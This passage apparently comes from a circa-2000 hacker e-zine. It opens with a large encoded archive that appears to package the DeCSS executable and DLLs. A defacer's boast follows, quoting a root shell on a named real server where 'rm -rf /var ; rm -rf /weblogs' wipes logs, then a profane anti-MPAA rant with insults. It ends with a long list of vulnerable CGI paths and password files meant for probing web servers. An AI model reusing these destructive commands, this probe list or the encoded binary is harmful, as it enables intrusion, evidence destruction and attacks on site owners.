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 
K6zSLN7aKGJlFZEcm1OFc9qkUMAK2hElUMcjUsta1IF1beOG/27v7IObOK4A /uyY8uF8AWYCnpK4CVAXDN371J1kSZUt2RbIH0Eei8mExrJ1UJGzpEgnx3Yh pQ2dTBOakqI005SQydekhH5AoK3Tob0OpdQhQNtEnZYOacChxdN0WiZtRnLD JH17kopsoDOdTtL+sT/Nu/d2993bd3uy5nZP8ulWcG9nu8ffcSmzoL+jtTzP 7kBnMFhWQTfJdMyIDmiFWrz4oPdyf9uWGbIuevyZodmoGlBT/3Wo6ZXjZtT0 55HfRD2P+qOmXxC6iJre4a9fnRlahPpO1PQCdBvqYdQZ1CP0Wgo1vUg6iJou 0I2u/s+ueWdxU/3rppUV7r+/hmYwGIz/FThd+0l10V6MdlXR/lqZ/WW0ZxXt h8vsr5TZO8rsR8rsr5bZO8ts+qW8mSj0A3QOOw0MBoPBYDAYDAaDwWBMob4X YN/eFoneMzD6AQ72Xtkv0QfQFQboRUmgbEV5GGU3ykGUoyhZlDMoF1BmoX8t Sj2KjBJAuQNlA8qnsP0+1NtRdqG8iHIIZQwli3IO5W2UKsznRpQGFC/Knf2F XJb6Js1Pp3NmBmVTPGdGzuTM8a68+Z2xnPlcIme+MZIzE8snzYUrJs2de/Pm t36WNy+unDSPZfPmb+bnzZx30jyCdZ99fdLcdsOk+ZInb55/P2e+O5gzbzub N89h3atbcqYRyplfXJcz99+bM3+N/TzZlDd/hfHueylnPoNCcxmtWKul0gNa t7UMDyBCMxqG1p42tCEPwIpi2TeoxQwsu4vlkv9N0KzHU1pbOBbRNXgTWjUj EE4ZPrqsDcBVhsJRoyWeDEZjG3Wts2+T1m+AH7zWyrw/3hyPGcm4DiuLUVui uuaB8xVBzbA6BDiA+elaOFVICOBV2oPv0q2KoJHE0Cl4itY3xwcGMJFANIZR +Aqs6dGSqWg8BhAB31DU6ErG+7VUCl62vNPJJEYoHIkfj2VBZbeewq57wnpa g3m05NGt//o3n9otSU2DGmq1lnyWVfYU7gpYbUtKpeJeb9Fe2uORtG4dWEd4 ANOCDK31NHcB5KnV6Wun9uNWRl3+2IY4zKeZB41IcVDh97SNRugeTmgwt9Aa xp4S1N0DTZWhZLQweHBHhT8WNaJhPTqiNWNttD+sBzXrhgW04LjrmnFZ/e3g ixlacno16BUBLTx4mTus8a3t8AUEflVE19knEIPBYDAYDAaDwfgw+dPKnZ+k enWi8PVpep+e3k+vx7KC4kXpnYvz/rkF/33zAEJYdzfK1kTBtwJCHYXfCFiz GjpFs0reQKA0h/xXXTCdSMSThjVXC2qxSKG2OPlkp4PBYDAYDAaDwWAwGIwP hIni/J/O4unvpBYWn8xWXk/XBchV6ttQerGl6grPz6u6RsRtDwThLtz6YC1a fuiEDiz7cduCNuVHVX99r7D6UFH8CXdBu0tx8DX9MXx9ldQrCAYkIQox2IjR oqCDhpFjsAHi6OOyfAiIKKql+6zH4hGYjfXN6DMACQij/zBmE8aSZsX2QARL CYytAf3aQQfUoH8pvhclhfW0X+oTxTix4n5B6ML+66z+k6hD1nEKwKPthQC+ KDJcWxavByWJES/F4aAB/cmULYWHObgfPT7D2ieGWeplmYfQLuVA+wRr9Gtx nwC2b7S86VEn8Hhp9hvhM0CfQ3h5XR3sQZk6DnWYl4qvwqMam+B6jNtZ3Cda zKV0TLGr5rSqbBz64FaM0YUx4thTGvswpp2Hfzee7daZC2PvmtU21aeUp90a 66l9TB9x/irj7bXeiT3YR/IK7y6AJdZqWTe20kxS2B6e8n6YXbWvin3CMBgM BoPBYDAYjP8LcMK/FSfataSOLCOE2EkTWUe2ke3kMbKLPEv2kFFikqPkBMmS 
N8kF8g55j8zgFnCf4JzcGi7MbeLu5bZyT3Df4/7BVfOLeJ5v5W/nH+QP86f5 cf48/zd+hnCdcLOwVOAFh7BaSAkjwrPCXmG/MCocFl4RssJZ4S2hUqwW14sR MSluEe8XvyQ+Kn5DfF48II6KJ8Ws+I74rlgj1Uq3SMulVikgrZVC0qD0eekB 6ZfSGWmNHJeH5d3y8/KL8g/kI/LL8vvyPFut7TZbg81ta7Gtsa2zrbeN2Ezb EdtZ24TtbdtM5WZluUIUh9KlhJQTSlY5rfxB+YuSV2ao1apT9aqD6jb1IfVR 9cdqVj2t/lFdbJftP7T/1D5mP2k/ZRccqmO7I+v4fuMvGq93fsy5wqk4m5wP Oh9z7nI+5TzunOFa6FrqElwbXPe7drqecx11jbsmXB9xV7sXupe5G90ed5v7 Lvce9wm6uFEHMIaqktxAFpClpJH4yXpyNzHI58jj5BA5Rl4j4+QijvmN3E3c LdwyTsSRH+DS3BYuw73CTeC4A/80/wJ/hD/Jn+LP8ItxXFeKgniPOIxj+ZD4 iHgcx/B34rh4nbRK6pQ2Szukr0sHpDHppJSVquW58iL543K/nJQfkA/Jh+XX 5FPyG/K3cbyO2uYoNcqtSr0iK5uUe5QvKBnlCeW7ys+VCeWCMlNdpO5Wn1b3 q8fU11X6xCS60rOEtJEdJEOO27P20/Zz9j/b/26/aK9yXOuocXzUscTR4BAd jQ7dsRlHkP3xMRgMBoPBYDAYDMaHxz8BUEsBAhQAFAACAAgAe4tMJwsWduNp AgAAGgYAAAoAAAAAAAAAAQAgALaBAAAAAHJlYWRtZS50eHRQSwECFAAUAAIA CAC6jUwntRjr0dtuAAAAdgAACQAAAAAAAAAAACAA/4GRAgAARGVDU1MuZXhl UEsBAhQAFAACAAgAUZlCJtHnMODoVQAAAOAAABAAAAAAAAAAAAAgALaBk3EA AHduYXNwaTMyLncyay5kbGxQSwECFAAUAAIACAAgoKskExRnrzAbAAAAkAAA EAAAAAAAAAAAACAAtoGpxwAAV25hc3BpMzIudzk4LmRsbFBLBQYAAAAABAAE AOsAAAAH4wAAAAA= ==== ------------------------ END ------------------------------ BlaznWeed's recent hack: http://www.attrition.org/mirror/attrition/2000/04/10/web1.carsacrossamerica.com/mirror.html bash# uname -a ; w ;id Linux web1.carsacrossamerica.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown 10:52pm up 11 days, 8:56, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - 30Mar 0 11days 0.06s 0.02s -bash cars pts/0 216.3.51.40 3:33pm 7:08m 0.05s 0.05s -bash uid=0(root) gid=505(davem) groups=505(davem) bash#rm -rf /var ; rm -rf /weblogs sorry but i'm lazy :P /*********************************************************************/ This mpaa issue has gone on long enough. We as a global community cannot afford to let america control every aspect of our live. 
This isn't just about copying DVD's this is about retaining our rights to intellectual freedoms which the government of america will gladly allow the mpaa violate. If I purchase a dvd player I should have the right to do and/or view whatever I want on my private property. There should NO territorial lockout or encryption to stop me from using *my* property to its fullest. The retarded excuse for territorial lockout given by the movie industry is that they are able to release movies in countries at a time that would maximize there profits. The truth is however rather different the reason territorial lockout exists on players is, so they can brainwash harry homeowner with there own doctrine and minimize the possibility of foreign governments releasing materials which can be viewed by harry homeowner that would change his/her mind about certain political issues. I fully support 2600's stance against corparate bullies , if mpaa thinks they can wipeout decss by taking 2600 offline they got another thing coming. dowload css-auth below for the source code to decss (unix only) css-auth.tar download decss.zip below if your a windowz kid decss.zip -BlazinWeed Shouts: everyone in wkD and everyone else thats down with me you know who you be Fucks: mpaa (isn't that a suprise ?) , Freemasons and all you other bitches that sliped my mind Attrition lamer of the week: Mcm4nus .. this kiddies is responsible for a truck load of hacks that say jack shit "hacked by Mcm4nus " oh fuckin *pheer*. kiddies please if your going to deface something then at least fuckin say something. the decss link above obviously won't work when the admin removes the file so I also enclose the uuencode of the zip and tarball if you don't know how to decode these you suck. 
[snip]

@HWA

05.0 b0f:Common WWW and CGI vulnerabilities list
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/cgi-bin/whois_raw.cgi
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/php-cgi
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdispaly.cgi
/cgi-bin/perl.exe
/cgi-bin/bigconf.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/htsearch
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/get32.exe
/cgi-bin/man.sh
/cgi-bin/meta.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger?@localhost
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/classified.cgi
/cgi-bin/environ.cgi
/cgi-bin/fpexplore.exe
/cgi-bin/imagemap.exe
/cgi-bin/cgitest.exe
/cgi-bin/anyboard.cgi
/cgi-bin/webbbs.cgi
/cgi-bin/visadmin.exe
/cgi-bin/nph-publish
/cgi-bin/perlshop.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/cachemgr.cgi
/cgi-bin/query
/cgi-bin/rpm_query
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/architext_query.pl
/cgi-bin/w3-msql/
/cgi-bin/add_ftp.cgi
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/whois.cgi
/cgi-bin/mlog.phtml
/cgi-bin/archie
/cgi-bin/bb-hist.sh
/cgi-bin/nph-error.pl
/cgi-bin/post_query
/cgi-bin/ppdscgi.exe
/cgi-bin/webmap.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/webutils.pl
/cgi-bin/axs.cgi
/cgi-bin/responder.cgi
/cgi-bin/plusmail
/cgi-bin/passwd.txt
/cgi-bin/Cgitest.exe
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/webwho.pl
/cgi-bin/search.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/search/tidfinder.cgi
/cgi-bin/wa
/cgi-bin/tablebuild.pl
/cgi-bin/displayTC.pl
/cgi-bin/uptime
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/c_download.cgi
/cgi-bin/download.cgi
/cgi-bin/program.pl
/cgi-bin/ntitar.pl
/cgi-bin/enter.cgi
/cgi-bin/test.html
/cgi-bin/test-unix.html
/cgi-bin/printenv
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/cgiback.cgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/gH.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/php
/cgi-bin/perl
/cgi-bin/wwwboard.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/flexform.cgi
/cgi-bin/MachineInfo
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/icat
/cgi-bin/tst.bat
/com1
/com2
/com3
/con
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
